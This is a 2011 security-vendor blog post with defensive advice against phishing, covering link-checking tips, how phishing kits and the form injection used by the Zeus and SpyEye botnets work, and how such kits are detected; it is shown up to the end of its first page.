Subscribe / Unsubscribe Enewsletters | Login | Register

Pencil Banner

BLOG: Guarding against phishing

Derek Manky | June 3, 2011
Google has recommended that Gmail users begin using a two-step verification process that requires users to enter a code, sent to their phone, after they have entered their password and here are some more tips about combating the threats.

Avoiding the hook

 Always pay attention to links ("think before you link") before you click. Hover your mouse over links to see where they are really taking you, before clicking. Carefully observe the domain in the link. Remember, "validbank.com" is different from "validbank.com.accounts.com". Never give out a credit card number on an unsolicited request. Always ensure SSL (HTTPS) secure transactions are enabled when making any transaction online (look for the lock icon in your browser). If the browser claims the certificate is not valid, hold off until you verify with security experts. Finally, do a search to see if others have spotted any suspicious activity on the subject line/content of the message. Fortinet's FortiGuard blog is a great place to start.

Phishing kits

 Attackers may obtain kits to deploy on Web servers to make their phish seem legitimate. These kits often contain pre-supplied templates for popular banks and social networking sites. After a victim is hooked, they will be brought to the attacker's controlled Website and presented with the proper template (i.e. HTML code and graphics that mirror www.validbank.com's setup). Of course, when the victim enters their credentials - it is sent to the phisher's Website, and collected by the phishing kit.

Like most crimeware (software tools used for criminal purposes), hundreds of phishing kits exist today. One of the most popular is the Rock Phish kit. There are advanced phishing components in botnets such as Zeus and SpyEye. These use a technique known as form injection. In this case, the user's machine is already compromised (even if they log in to validbank's real site, their credentials will be sent to the attacker regardless).

However, the attacker will extract further information by injecting fields into a banking session while the victim is logging in. For example, they will supply an additional field to obtain a driver's licence number or mother's maiden name. These credentials are then leveraged down the road, typically for identity fraud.

Detecting kits

Common phishing kits can be detected by using anti-virus and Web filtering applications. Generic anti-virus detection can help detect a kit no matter what Web server it is deployed on. Web filtering can guard against phishing Web servers, even if they are changing code/ templates to avoid detection. Kits can redirect you to the original site after hooking your information, so it's not good practice to assume that since you can log in successfully, nothing malicious has occurred.

 

 

The Four Types of Phishing Scams

 

Phishing Blind

 

Spear-Phishing

 

Whaling

 

Vishing

 

Blind phishing is simply the act of casting the bait out into cyber space, usually through mass spam e-mails, hoping someone will bite. These attacks usually go after common criteria like banking and social network credentials.

 

Previous Page  1  2  3  Next Page 

Sign up for CIO Asia eNewsletters.